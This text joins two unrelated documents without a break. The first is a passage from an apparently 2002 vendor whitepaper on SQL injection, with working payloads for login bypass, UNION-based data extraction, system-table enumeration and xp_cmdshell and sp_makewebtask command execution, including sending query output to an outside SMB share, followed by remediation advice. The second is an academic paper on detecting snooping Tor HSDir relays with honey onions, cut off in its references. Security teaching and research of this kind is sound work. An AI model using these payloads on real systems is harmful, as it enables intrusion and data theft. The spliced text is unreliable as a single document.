of a script and the server returns a nice blank, white screen with nothing but an ODBC error on it, but such is not always the case. It is very easy to overlook a perfectly vulnerable script if you don't pay attention to details. Every parameter of every script on the server should always be checked. Developers and development teams can be awfully inconsistent. The programmer who designed Script A might have had nothing to do with the development of Script B, so where one might be immune to SQL injection, the other might be ripe for abuse. In fact, the programmer who worked on Function A in Script A might have nothing to do with Function B in Script A, so while one parameter in Script A might be vulnerable, another might not. Even if a whole web application is conceived, designed, coded and tested by one single, solitary programmer, there might be only one vulnerable parameter in one script out of thousands of other parameters in millions of other scripts, because for whatever reason, that developer forgot to sanitize the data in that one place and that one place only. You never can be sure. Test everything. 2.2. Testing procedure Replace the argument of each parameter with a single quote and an SQL keyword ("' WHERE", for example). Each parameter needs to be tested individually. Not only that, but when testing each parameter, leave all of the other parameters unchanged, with valid data as their arguments. It can be tempting to just delete all of the stuff that you're not working with in order to make things look simpler, particularly with applications that have parameter lines that go into many thousands of characters. Leaving out parameters or giving other parameters bad arguments while you're testing another for SQL injection can break the application in other ways that prevent you from determining whether or not SQL injection is possible. For instance, let's say that this is a completely valid, unaltered parameter line: ContactName=Maria%20Anders&CompanyName=Alfreds%20Futterkiste And this parameter line gives you an ODBC error: ContactName=Maria%20Anders&CompanyName='%20OR Where checking with this line: CompanyName=' Might just give you an error telling you that you that you need to specify a ContactName value. This line: © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 5 ContactName=BadContactName&CompanyName=' Might give you the same page as the request that didn't specify ContactName at all. Or, it might give you the site’s default homepage. Or, perhaps when it couldn't find the specified ContactName the application figured that there was no point in looking at CompanyName, so it didn't even pass the argument of that parameter into an SQL statement at all. Or, it might give you something completely different. So, when testing for SQL injection, always use the full parameter line, giving every argument except the one that you are testing a legitimate value. 2.3. Evaluating results If you get a database server error message of some kind back, injection was definitely successful. However, the database error messages aren't always obvious. Again, developers do some strange things, so you should look in every possible place for evidence of successful injection. The first thing you should do is search through the entire source of the returned page for phrases like "ODBC", "SQL Server", "Syntax", etc. More details on the nature of the error can be in hidden input, comments, etc. Check the headers. I have seen web applications on production systems that give you an error message with absolutely no information in the body of the HTTP response, but that have the database error message in a header. Many web applications have these kinds of features built into them for debugging and QA purposes, and then forget to remove or disable them before release. Not only should you look on the immediately returned page, but in linked pages as well. During a recent pen-test, I saw a web application that returned a generic error message page in response to an SQL injection attack. Clicking on a stop sign image next to the error that was linked to another page gave the full SQL Server error message. Another thing to watch out for is a 302 page redirect. You may be whisked away from the database error message page before you even get a chance to notice it. Please note that SQL injection may be successful even if you do get an ODBC error messages back. Lots of the time you get back a properly formatted, seemingly generic error message page telling you that there was "an internal server error" or a "problem processing your request." Some web applications are built so that in the event of an error of any kind, the client is returned to the site’s main page. If you get a 500 Error page back, chances are that injection is occurring. Many sites have a default 500 Internal Server Error page that claims that the server is down for maintenance, or that politely asks the user to email their request to their support staff. It can be possible to take advantage of these sites using stored procedure techniques, which are discussed later. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 6 3. Attacks 3.1. Authorization bypass The simplest SQL injection technique is bypassing form-based logins. Let's say that the web application’s code is like this: SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'" strAuthCheck = GetQueryResult(SQLQuery) If strAuthCheck = "" Then boolAuthenticated = False Else boolAuthenticated = True End If Here's what happens when a user submits a username and password. The query will go through the Users table to see if there is a row where the username and password in the row match those supplied by the user. If such a row is found, the username is stored in the variable strAuthCheck, which indicates that the user should be authenticated. If there is no row that the user-supplied data matches, strAuthCheck will be empty and the user will not be authenticated. If strUsername and strPassword can contain any characters that you want, you can modify the actual SQL query structure so that a valid name will be returned by the query even if you do not know a valid username or a password. How does this work? Let's say a user fills out the login form like this: Login: ' OR ''=' Password: ' OR ''=' This will give SQLQuery the following value: SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='' Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, will always return true. (Please note that nothing is different from null.) Since all of the qualifying conditions in the WHERE clause are now met, the username from the first row in the table that is searched will be selected. This username will subsequently be passed to strAuthCheck, which will ensure our validation. It is also possible to use another row’s data, using single result cycling techniques, which will be discussed later. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 7 3.2. SELECT For other situations, you must reverse-engineer several parts of the vulnerable web application's SQL query from the returned error messages. In order to do this, you must know what the error messages that you are presented with mean and how to modify your injection string in order to defeat them. 3.2.1. Direct vs. Quoted The first error that you are normally confronted with is the syntax error. A syntax error indicates that the query does not conform to the proper structure of an SQL query. The first thing that you need to figure out is whether injection is possible without escaping quotation. In a direct injection, whatever argument you submit will be used in the SQL query without any modification. Try taking the parameter's legitimate value and appending a space and the word "OR" to it. If that generates an error, direct injection is possible. Direct values can be either numeric values used in WHERE statements, like this: SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE Employee = " & intEmployeeID Or the argument of an SQL keyword, such as table or column name, like this: SQLString = "SELECT FirstName, LastName, Title FROM Employees ORDER BY " & strColumn All other instances are quoted injection vulnerabilities. In a quoted injection, whatever argument you submit has a quote prepended and appended to it by the application, like this: SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE EmployeeID = '" & strCity & "'" In order to “break out” of the quotes and manipulate the query while maintaining valid syntax, your injection string must contain a single quote before you use an SQL keyword, and end in a WHERE statement that needs a quote appended to it. And now to address the problem of “cheating”. Yes, SQL Server will ignore everything after a “;--”, but it's the only server that does that. It's better to learn how to do this the "hard way" so that you'll know how to do this if you run into an Oracle, DB/2, MySQL or any other kind of database server. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 8 3.2.2. Basic UNION Figure 1: Syntax breaking on direct injection Figure 2: Syntax breaking on a quoted injection © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 9 SELECT queries are used to retrieve information from a database. Most web applications that use dynamic content of any kind will build pages using information returned from SELECT queries. Most of the time, the part of the query that you will be able to manipulate will be the WHERE clause. The way to modify a query from within a WHERE clause to make it return records other than those intended is to inject a UNION SELECT. A UNION SELECT allows multiple SELECT queries to be specified in one statement. They look something like this: SELECT CompanyName FROM Shippers WHERE 1 = 1 UNION ALL SELECT CompanyName FROM Customers WHERE 1 = 1 This will return the recordsets from the first query and the second query together. The ALL is necessary to escape certain kinds of SELECT DISTINCT statements and doesn't interfere otherwise, so it’s best to always use it. It is necessary to make sure that the first query, the one that the web application’s developer intended to be executed, returns no records. This is not difficult. Let's say you're working on a script with the following code: SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE City = '" & strCity & "'" And use this injection string: ' UNION ALL SELECT OtherField FROM OtherTable WHERE ''=' This will result in the following query being sent to the database server: SELECT FirstName, LastName, Title FROM Employees WHERE City = '' UNION ALL SELECT OtherField FROM OtherTable WHERE ''='' Here's what will happen: the database engine goes through the Employees table, looking for a row where City is set to nothing. Since it will not find a row where City is nothing, no records will be returned. The only records that will be returned will be from the injected query. In some cases, using nothing will not work because there are entries in the table where nothing is used, or because specifying nothing makes the web application do something else. All you have to do is specify a value that does not occur in the table. Just put something that looks out of the ordinary as best you can tell by looking at the legitimate values. When a number is expected, zero and negative numbers often work well. For a text argument, simply use a string such as "NoSuchRecord", "NotInTable", or the ever-popular "sjdhalksjhdlka". Just as long as it won't return records. It would be nice if all of the queries used in web applications were as simple as the ones above. However, this is not the case. Depending on the function of the intended query as well as the habits of the developer, you may have a tough time breaking the syntax error. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 10 3.2.3. Query enumeration with syntax errors Some database servers return the portion of the query containing the syntax error in their error messages. In these cases you can “bully” fragments of the SQL query from the server by deliberately creating syntax errors. Depending on the way that the query is designed, some strings will return useful information and others will not. Here's my list of suggested attack strings: ' BadValue' 'BadValue ' OR ' ' OR ; 9,9,9 Often several of those strings will return the same or no information, but there are instances where only one of them will give you helpful information. Again, always be thorough. Try all of them. 3.2.4. Parenthesis © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 11 Figure 3: Parenthesis breaking on a quoted injection If the syntax error contains a parenthesis in the cited string (such as the SQL Server message used in the example below) or you get a message that explicitly complains about missing parentheses (Oracle does this), add a parenthesis to the bad value part of your injection string, and one to the WHERE clause. In some cases, you may need to use two or more parentheses. Here’s the code used in parenthesis.asp: mySQL="SELECT LastName, FirstName, Title, Notes, Extension FROM Employees WHERE (City = '" & strCity & "')" So, when you inject the value “') UNION SELECT OtherField FROM OtherTable WHERE (''='”, the following query will be sent to the server: SELECT LastName, FirstName, Title, Notes, Extension FROM Employees WHERE (City = '') UNION SELECT OtherField From OtherTable WHERE (''='') © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 12 3.2.5. LIKE queries Figure 4: LIKE breaking on a quoted injection Another common debacle is being trapped in a LIKE clause. Seeing the LIKE keyword or percent signs cited in an error message are indications of this situation. Most search functions use SQL queries with LIKE clauses, such as the following: © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 13 SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE LastName LIKE '%" & strLastNameSearch & "%'" The percent signs are wildcards, so in this case, the WHERE clause would return true in any case where strLastNameSearch appears anywhere in LastName. In order to stop the intended query from returning records, your bad value must be something that none of the values in the LastName field contain. The string that the web application appends to the user input, usually a percent sign and single quote (and often parenthesis as well), needs to be mirrored in the WHERE clause of the injection string. Also, using nothing as your bad values will make the LIKE argument “%%”, resulting in a full wildcard, which returns all records. The second screenshot shows a working injection query for the above code. 3.2.6. Dead Ends There are situations that you may not be able to defeat without an enormous amount of effort or even at all. Occasionally you'll find yourself in a query that you just can't seem to break. No matter what you do, you get error after error after error. Lots of the time this is because you're trapped inside a function that's inside a WHERE clause that's in a subselect which is an argument of another function whose output is having string manipulations performed on it and then used in a LIKE clause which is in a subselect somewhere else. Or something like that. Not even SQL Server's “;--” can rescue you in those cases. 3.2.7. Column number mismatch © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 14 © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 15 © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 16 Figure 5: Column number matching If you can get around the syntax error, the hardest part is over. The next error message you get will probably complain about a bad table name. Choose a valid system table name from the appendix that corresponds to the database server that you're up against. You will then most likely be confronted with an error message that complains about the difference in number of fields in the SELECT and UNION SELECT queries. You need to find © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 17 out how many columns are requested in the legitimate query. Let's say that this is the code in the web application that you’re attacking: SQLString = SELECT FirstName, LastName, EmployeeID FROM Employees WHERE City = '" & strCity "'" The legitimate SELECT and the injected UNION SELECT need to have an equal number of columns in their WHERE clauses. In this case, they both need three. Not only that, but their column types need to match as well. If FirstName is a string, then the corresponding field in your injection string needs to be a string as well. Some servers, such as Oracle, are very strict about this. Others are more lenient and allow you to use any data type that can do implicit conversion to the correct data type. For example, in SQL Server, putting numeric data in a varchar's place is okay, because numbers can be converted to strings implicitly. Putting text in a smallint column, however, is illegal because text cannot be converted to an integer. Because numeric types often convert to strings easily but not vice versa, use numeric values by default. To determine the number of columns you need to match, keep adding values to the UNION SELECT clause until you stop getting a column number mismatch error. If a data type mismatch error is encountered, change the type of data of the column you entered from a number to a literal. Sometimes you will get a conversion error as soon as you submit an incorrect data type. Other times, you will only get the conversion message once you've matched the correct number of columns, leaving you to figure out which columns are the ones that are causing the error. When the latter is the case, matching the value types can take a very long time, since the number of possible combinations is two raised to number of columns in the query. Oh, did I mention that 40 column SELECTs are not terribly uncommon? If all goes well, you should get back a page with the same formatting and structure as a legitimate one. Wherever dynamic content is used you should have the results of your injection query. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 18 3.2.8. Additional WHERE columns Figure 6: Additional WHERE column breaking Sometimes your problem may be additional WHERE conditions that are added to the query after your injection string. Take this line of code for instance: SQLString = "SELECT FirstName, LastName, Title FROM Employees © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 19 WHERE City = '" & strCity & "' AND Country = 'USA'" Trying to deal with this query like a simple direct injection would yield a query like this: SELECT FirstName, LastName, Title FROM Employees WHERE City = 'NoSuchCity' UNION ALL SELECT OtherField FROM OtherTable WHERE 1=1 AND Country = 'USA' Which yields an error message such as: [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Country'. The problem here is that your injected query does not have a table in the FROM clause that contains a column named 'Country' in it. There are two ways of solving this problem: cheat and use the “;--” terminator if you're using SQL Server, or guess the name of the table that the offending column is in and add it to your FROM. Use the attack queries listed in section 3.2.3 to try and get as much of the legitimate query back as possible. 3.2.9. Table and field name enumeration © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 20 Figure 7: Table and field name enumeration Now that you have injection working, you have to decide what tables and fields you want to retrieve information from. With SQL Server, you can easily get all of the table and column names in the database. With Oracle and Access you may or may not be able to do this, depending on the privileges of the account that the web application is accessing the database with. The key is to be able to access the system tables that contain the table and column names. In SQL Server, they are called 'sysobjects' and 'syscolumns', respectively. (There is a list of system tables for other database servers at the end of this document. You will also need to know relevant column names in those tables). In these tables there will be listings of all of the tables and columns in the database. To get a list of user tables in SQL Server, use the following injection query, modified to fit whatever circumstances you find yourself in, of course: SELECT name FROM sysobjects WHERE xtype = 'U' This will return the names of all of the user-defined (that's what xtype = 'U' does) tables in the database. Once you find one that looks interesting (we'll use Orders), you can get the names of the fields in that table with an injection query similar to this: © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 21 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Orders') 3.2.10. Single record cycling © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 22 © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 23 Figure 8: Single record cycling If possible, use an application that is designed to return as many results as possible. A search tool is ideal because they are made to return results from many different rows at once. Some applications are designed to use only one recordset in their output at a time, and ignore the rest. If you're stuck with a single product display application, it's okay. You can manipulate your injection query to allow you to slowly, but surely, get your desired information back in full. This is accomplished by adding qualifiers to the WHERE clause that prevent certain rows’ information from being selected. Let's say you started with this injection string: ' UNION ALL SELECT name, FieldTwo, FieldThree FROM TableOne WHERE ''=' And you got the first values in FieldOne, FieldTwo and FieldThree injected into your document. Let's say the values of FieldOne, FieldTwo and FieldThree were "Alpha", "Beta" and "Delta", respectively. Your second injection string would be: ' UNION ALL SELECT FieldOne, FieldTwo, FieldThree FROM TableOne WHERE FieldOne NOT IN ('Alpha') AND FieldTwo NOT IN © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 24 ('Beta') AND FieldThree NOT IN ('Delta') AND ''=' The NOT IN VALUES clause makes sure that the information that you already know will not be returned again, so the next row in the table will be used instead. Let’s say these values were "AlphaAlpha", "BetaBeta" and "DeltaDelta"... ' UNION ALL SELECT FieldOne, FieldTwo, FieldThree FROM TableOne WHERE FieldOne NOT IN ('Alpha', 'AlphaAlpha') AND FieldTwo NOT IN ('Beta', 'BetaBeta') AND FieldThree NOT IN ('Delta', 'DeltaDelta') AND ''=' This will prevent both the first and second sets of values you know from being returned. You just keep adding arguments to VALUES until there are none left to return. Yes, this makes for some rather large and cumbersome queries while going through a table with many rows, but it's the best method that there is. 3.3. INSERT 3.3.1. Insert basics The INSERT keyword is used to add information to the database. Common uses of INSERTs in web applications include user registrations, bulletin boards, adding items to shopping carts, etc. Checking for vulnerabilities with INSERT statements is the same as doing it with WHEREs. You may not want to try to use INSERTs if avoiding detection is an important issue. INSERT injection attempts often result in rows in the database that are flooded with single quotes and SQL keywords from the reverse-engineering process. Depending on how watchful the administrator is and what is being done with the information in that database, it may be noticed. Having said that, here's how INSERT injection differs from SELECT injection. Let's say you're on a site that allows user registration of some kind. It provides a form where you enter your name, address, phone number, etc. After you've submitted the form, you can go to a page where it displays this information and gives you an option to edit it. This is what you want. In order to take advantage of an INSERT vulnerability, you must be able to view the information that you've submitted. It doesn't matter where it is. Maybe when you log in it greets you with the value it has stored for your name in the database. Maybe they send you spam mail with the name value in it. Who knows. Find a way to view at least some of the information you've entered. 3.3.2. Injecting subselects An INSERT query looks something like this: INSERT INTO TableName VALUES ('Value One', 'Value Two', 'Value Three') © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 25 You want to be able to manipulate the arguments in the VALUES clause to make them retrieve other data. We can do this using subselects. Let's say the code looks like this: SQLString = "INSERT INTO TableName VALUES ('" & strValueOne & "', '" & strValueTwo & "', '" & strValueThree & "')" And we fill out the form like this: Name: ' + (SELECT TOP 1 FieldName FROM TableName) + ' Email: blah@blah.com Phone: 333-333-3333 Making the SQL statement look like this: INSERT INTO TableName VALUES ('' + (SELECT TOP 1 FieldName FROM TableName) + '', 'blah@blah.com', '333-333-3333') When you go to the preferences page and view your user's information, you'll see the first value in FieldName where the user's name would normally be. Unless you use TOP 1 in your subselect, you'll get back an error message saying that the subselect returned too many records. You can go through all of the rows in the table using NOT IN () the same way it is used in single record cycling. 3.4. SQL Server Stored Procedures 3.4.1. Stored procedure basics An out-of-the-box install of Microsoft SQL Server has over one thousand stored procedures. If you can get SQL injection working on a web application that uses SQL Server as it's backend, you can use these stored procedures to pull off some remarkable feats. I will here discuss a few procedures of particular interest. Depending on the permissions of the web application's database user, some, all or none of these may work. The first thing you should know about stored procedure injection is that there is a good chance that you will not see the stored procedure's output in the same way you get values back with regular injection. Depending on what you're trying to accomplish, you may not need to get data back at all. You can find other means of getting your data returned to you. Procedure injection is much easier than regular query injection. Procedure injection into a quoted vulnerability should look something like this: simplequoted.asp?city=seattle';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c: Notice how a valid argument is supplied at the beginning and followed by a quote and the final argument to the stored procedure has no closing quote. This will satisfy the syntax requirements inherent in most quoted vulnerabilities. You may also have to deal with © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 26 parentheses, additional WHERE statements, etc., but after that, there's no column matching or data types to worry about. This makes it possible to export vulnerability in the same way that you would with applications that do not return error messages. On to a couple of my favorite stored procedures. 3.4.2. xp_cmdshell xp_cmdshell {'command_string'} [, no_output] master.dbo.xp_cmdshell is the holy grail of stored procedures. It takes a single argument, which is the command that you want to be executed at SQL Server's user level. The problem? It's not likely to be available unless the SQL Server user that the web application is using is sa. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 27 3.4.3. sp_makewebtask © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 28 Figure 9: Using sp_makewebtask sp_makewebtask [@outputfile =] 'outputfile', [@query =] 'query' Another favorite of mine is master.dbo.sp_makewebtask. As you can see, its arguments are an output file location and an SQL statement. sp_makewebtask takes a query and builds a webpage containing its output. Note that you can use a UNC pathname as an output location. This means that the output file can be placed on any system connected to the Internet that has a publicly writable SMB share on it. (The SMB request must generate no challenge for authentication at all). If there is a firewall restricting the server's access to the Internet, try making the output file on the website itself. (You'll need to either know or guess the webroot directory). Also be aware that the query argument can be any valid T-SQL statement, including execution of other stored procedures. Making "EXEC xp_cmdshell 'dir c:'" the @query argument will give you the output of "dir c:" in the webpage. When nesting quotes, remember to alternate single and double quotes. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 29 4. Solutions 4.1. Data sanitization All client-supplied data needs to be cleansed of any characters or strings that could possibly be used maliciously. This should be done for all applications, not just those that use SQL queries. Stripping quotes or putting backslashes in front of them is nowhere near enough. The best way to filter your data is with a default-deny regular expression. Make it so that you only include that type of characters that you want. For instance, the following regexp will return only letters and numbers: s/[^0-9a-zA-Z]//g Make your filter as specific as possible. Whenever possible use only numbers. After that, numbers and letters only. If you need to include symbols or punctuation of any kind, make absolutely sure to convert them to HTML substitutes, such as "&quote;" or "&gt;". For instance, if the user is submitting an email address, allow only "@", "_", "." and "-" in addition to numbers and letters to be used, and only after those characters have been converted to their html substitutes. 4.2. Secure SQL web application coding There are also a few SQL injection specific rules. First, prepend and append a quote to all user input. Even if the data is numeric. Next, limit the rights of the database user that the web application uses. Don't give that user access to all of the system stored procedures if that user only needs access to a handful of user-defined ones. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 30 5. Database server system tables This section includes the names of system tables that are useful in SQL injection. You can get listings of the columns in each of these tables by searching for them on Google. 5.1. MS SQL Server sysobjects syscolumns 5.2. MS Access Server MSysACEs MSysObjects MSysQueries MSysRelationships 5.3. Oracle SYS.USER_OBJECTS SYS.TAB SYS.USER_TABLES SYS.USER_VIEWS SYS.ALL_TABLES SYS.USER_TAB_COLUMNS SYS.USER_CONSTRAINTS SYS.USER_TRIGGERS SYS.USER_CATALOG © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 31 6. The Business Case for Application Security Whether a security breach is made public or confined internally, the fact that a hacker has laid eyes on your sensitive data is of concern to your company, your shareholders, and most importantly, your customers. SPI Dynamics has found that the majority of companies that take a proactive approach to application security, and that continuously engage in the application security process, are better protected. In the long run, these companies enjoy a higher ROI on their e-business ventures. About SPI Dynamics, Inc. Founded in 2000 by a team of accomplished Web security specialists, SPI Dynamics mission is to develop security products and services that systematically detect, prevent, and communicate Web application vulnerabilities and intrusions for any online business, and provide intelligent methodological approaches for resolution of discovered vulnerabilities. Based in Atlanta, Georgia, SPI Dynamics is a privately held company. SPI Dynamics products are used in a wide variety of industries, including financial management, manufacturing, healthcare, telecommunications, and government. For further information please contact: SPI Dynamics, Inc. 115 Perimeter Center Place Suite 270 Atlanta, GA 30346 Toll-free: 1-866-SPI-2700 Direct: 678-781-4800 Fax: 678-781-4850 sales@spidynamics.com
Honey Onions: Exposing Snooping Tor HSDir Relays Guevara Noubir, Amirali Sanatinia College of Computer and Information Science Northeastern University, Boston, USA {noubir,amirali}@ccs.neu.edu Abstract—Tor is a widely used anonymity network that protects users’ privacy and identity from corporations, agencies and governments. However, Tor remains a practical system with a variety of limitations which can be subverted [1]. In particular, Tor’s security relies on the fact that a substantial number of its nodes do not misbehave. Previous work showed the existence of malicious participating Tor relays. For example, there are some Exit nodes that actively interfere with users’ traffic and carry out man-in-the-middle attacks. In this work we expose another category of misbehaving Tor relays (HSDirs), that are integral to the functioning of the hidden services and the dark web. The HSDirs act as the DNS directory for the dark web. Because of their nature, detecting their malicious intent and behavior is much harder. We introduce, the concept of honey onions (honions), a framework to detect misbehaving Tor relays with HSDir capability. By setting up and deploying a large scale honion over Tor for more than 72 days, we are able to obtain lower bounds on misbehavior among HSDirs. We propose algorithms to both estimate the number of snooping HSDirs and identify them, using optimization and feasibility techniques. Our experimental results indicate that during the period of our work at least 110 such nodes were snooping information about hidden services they host. We reveal that more than half of them were hosted on cloud infrastructure and delayed the use of the learned information to prevent easy traceback. Furthermore, we provide the most likely geolocation map of the identified snooping Tor HSDirs. I. HONION GENERATION & DETECTION In this work, we introduce the concept of honey onions (honions), a framework to expose when a Tor relay with HSDir capability has been modified to snoop into the hidden services that it currently hosts. We developed several tools, to automate the process of generating and deploying honions in a way that they cover a significant fraction of HSDirs. A key constraint in this process was to minimize the number of deployed honions. This derives primarily from our desire to not impact the Tor statistics about hidden services; specially given the recent surge anomaly (Figure 1). By considering the number of HSDirs (approximately 3000), we could infer that to cover all HSDirs with 0.95 probability, we need to generate around 1500 honions. We decided on three schedules to allow us to detect different snooping behaviors. Namely, daily, weekly and monthly. The daily schedule allows us to detect malicious HSDirs who visit honions shortly after hosting them. The weekly and monthly schedules enables us to detect more sophisticated snoopers who delay their visits to avoid identification. Fig. 1: Recent unexplained surge in the number of Hidden Services. HOnion back end servers: Each honion corresponds to a process that is running locally. The server behind hidden services, should not be running on a public IP address, to avoid de-anonymization. We also log all the requests that are made to the server programs and the time of each visit. Recording the content of the requests allows us to investigate the snoopers’ behavior and intent. HOnions generation and deployment schedule: To keep the total number of honions small, we decided on three schedules for their generation and placement, daily, weekly, and monthly. The three schedules allow us to detect the malicious HSDirs who visit the honions shortly (less than 24 hours) after hosting them. Since the HSDirs for hidden services change periodically, more sophisticated snoopers may wait for a longer duration of time, so they can evade detection and frame other HSDirs. Identifying snooping HSDirs: Based on the visited hidden service, the time of the visit, and the HSDir that have been hosting the specific onion address prior to the visit, we can mark the potential malicious and misbehaving HSDirs. Then, we add the candidates to a bipartite graph, which consists of edges between HSDirs and the visited honions. The analysis of this graph allows us to infer a lower bound on the number of malicious HSDirs as well as specific snoopers. Figure 2 depicts the architecture of the system. HOnion Visit Graph Formation: In the following we first introduce a formal model and notation for the Honey Onions 1. Generate honions ho i ho j 2. Place honions on HSDirs 3. Build bipartite graph On visit, mark potential HSDirs ho j di di+2 di+1 di di+1 di+2 On visit, add to bipartite graph Fig. 2: Flow diagram of the honion system. system. First, HO denotes the set of honey onions generated by the system that were visited, and HSD the set of Tor relays with the HSDir flag (so far referred to as HSDir relays). The visits of honions allow us to build a graph G = (V, E) whose vertices are the union of HO and HSD and edges connect a honion hoj and HSDir di iff hoj was placed on di and subsequently experienced a visit. G is by construction a bipartite graph. We also note that each honion periodically changes descriptors and therefore HSDirs (approximately once a day). However, a HSDir currently a honion ho cannot explain visits during past days. Therefore, each time a honion changes HSDirs we clone its vertex ho to ho0 and only add edges between ho0 and the HSDirs who know about its existence when the visit happened. Estimation & Set Cover: Since each honion is simultaneously placed on multiple HSDirs, the problem of identifying which ones are malicious is not trivial. We first formulate the problem of deriving a lower-bound on their number by finding the smallest subset S of HSD that can explain all the visits. The size s of the minimal set tells us that there cannot be less than s malicious HSDirs who would explain the visits. HSD = {di : Tor relays with HSDir flag} HO = {hoj : Honey Onion that was visited} V = HSD [ HO E = {(hoj, di) 2 HO ⇥ HSD|hoj was placed on di and subsequently visited} argmin S✓HSD |S : 8(hoj, di) 2 E9d0 i 2 S ^ (hoj, d0 i) 2 E| (1) Finding the smallest set S as defined by Equation 1, is not trivial as one can easily see that it is equivalent to the hitting set problem, which is well known to be NP-Complete. However, it can also be formulated as an Integer Linear Program. Let x1j|HSD| be binary variables taking values 0 or 1. Solving Equation 1, consists of finding integer assignments to the xj such that: (a) Daily Visits (b) All Visits Fig. 3: Plot of the visits to the honions. min(x1,...,xHSD) P|HSD| j=1 xj subject to 8hoi 2 HO P 8j:(hoi,dj)2E xj ≥ 1 II. RESULTS & DISCUSSION We started the daily honions on Feb 12, 2016; the weekly and monthly experiments on February 21, 2016, which lasted until April 24, 2016. During this period there were three spikes in the number of hidden services, with one spike more than tripling the average number of hidden services (Figure 1). There are some theories suggesting that this was due to botnets, ransomware, or the success of the anonymous chat service, called Ricochet. However, none of these explanations can definitely justify the current number of hidden services. Our daily honions spotted snooping behavior before the spike in the hidden services, this gives us a level of confidence that the snoopings are not only a result of the anomaly (Figure 3). Rather, there are entities that actively investigate hidden services. Snooping HSDirs Nature and Location: In total we detected at least 110 malicious HSDir using the ILP algorithm, and more than 40000 visits. More than 70% of these HSDirs are hosted on Cloud infrastructure. Around 25% are exit nodes as compared to the average, 15% of all relays in 2016, that have both the HSDir and the Exit flags. This can be interesting for further investigation, since it is known that some Exit nodes are malicious and actively interfere with users’ traffic and perform active MITM attacks [2]. Furthermore, 20% of the misbehaving HSDirs are, both exit nodes and are hosted Fig. 4: The global map of detected misbehaving HSDirs and their most likely geographic origin. on Cloud systems, with data centers in Europe and Northern America. The top 5 countries are, USA, Germany, France, UK, and Netherlands. Figure 4 depicts the spread and the most likely geolocation of the malicious HSDirs. HSDirs Behavior and Intensity of the Visits: Most of the visits were just querying the root path of the server and were automated. However, we identified less than 20 possible man- ual probing, because of a query for favicon.ico, the little icon that is shown in the browser, which the Tor browser requests. Some snoopers kept probing for more information even when we returned an empty page. For example, we had queries for description.json, which is a proposal to all HTTP servers inside Tor network to allow hidden services search engines such as Ahmia, to index websites. One of the snooping HSDirs (5.*.*.*:9011) was actively querying the server every 1 hour asking for a server-status page of Apache. It is part of the functionality provided by mod status in Apache, which provides information on server activity and performance. Ad- ditionally, we detected other attack vectors, such as SQL in- jection, targeting the information_schema.tables, username enumeration in Drupal, cross-site scripting (XSS), path traversal (looking for boot.ini and /etc/passwd), targeting Ruby on Rails framework (rails/info/properties), and PHP Easter Eggs (?=PHP*-*-*-*-*). III. CONCLUSION & FUTURE WORK In this work, we introduced honey onions (HOnions), a framework for methodically estimating and identifying Tor HSDir nodes that are snooping on hidden services they are hosting. We propose algorithms to both estimate the number of snooping HSDirs and identify them. Our experimental results indicate that during the period of the study (72 days) at least 110 such nodes were snooping information about hidden ser- vices they host. Furthermore, we observer that not all snooping HSDirs operate with the same level of sophistication and intensity. For example the less sophisticated snoopers visit the honions shortly after hosting them (less than 24 hours), while the more sophisticated snooping HSDirs delay their visits to avoid detection and frame their neighboring relays. We believe that behavior of the snoopers can be modeled and studied in more detail using a game theoretic framework. Additionally, we reveal that more than half of them were hosted on cloud infrastructure making it difficult to detect malicious Tor nodes. Specially some cloud providers such as Vultr, even accepts payments in the form of bitcoins, which prevents the traceback and identification of misbehaving entities. It is noteworthy that the current proposals [3] for the next generation of hidden services would improve their privacy and security. REFERENCES [1] A. Sanatinia and G. Noubir, “Onionbots: Subverting privacy infras- tructure for cyber attacks,” in The Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015. [2] P. Winter, R. K¨ower, M. Mulazzani, M. Huber, S. Schrittwieser, S. Lind- skog, and E. Weippl, 